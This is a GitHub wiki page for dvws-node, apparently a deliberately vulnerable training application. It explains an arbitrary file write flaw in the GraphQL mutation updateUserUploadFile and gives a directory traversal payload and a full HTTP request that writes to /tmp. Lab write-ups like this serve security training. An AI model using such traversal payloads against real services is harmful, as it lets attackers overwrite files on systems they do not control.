GraphQL Arbitrary File Write - snoopysecurity/dvws-node GitHub Wiki

Introduction

Arbitrary File Write allows attackers to traverse the file system to access files or directories that are outside of the restricted directory and write to files.

Technical Details

Within the GraphQL endpoint listening at port 4000, a mutation query called updateUserUploadFile exists. This query can be accessed by any authenticated user and can be used to traverse the file system and write to files.

  mutation {
  updateUserUploadFile(filePath: "../../../../../../tmp/test.txt",fileContent:"foo")
  {
		filePath,
    fileContent
  }
  
  
}

Example Request

POST /graphql HTTP/1.1
Host: localhost:4000
User-Agent: curl/7.58.0
Accept: */*
content-type: application/json
Content-Length: 184
Connection: close

{"query": "  mutation {\r\n  updateUserUploadFile(filePath: \"../../../../../../tmp/test.txt\",fileContent:\"foo\")\r\n  {\r\n\t\tfilePath,\r\n    fileContent\r\n  }\r\n  \r\n  \r\n}"}

References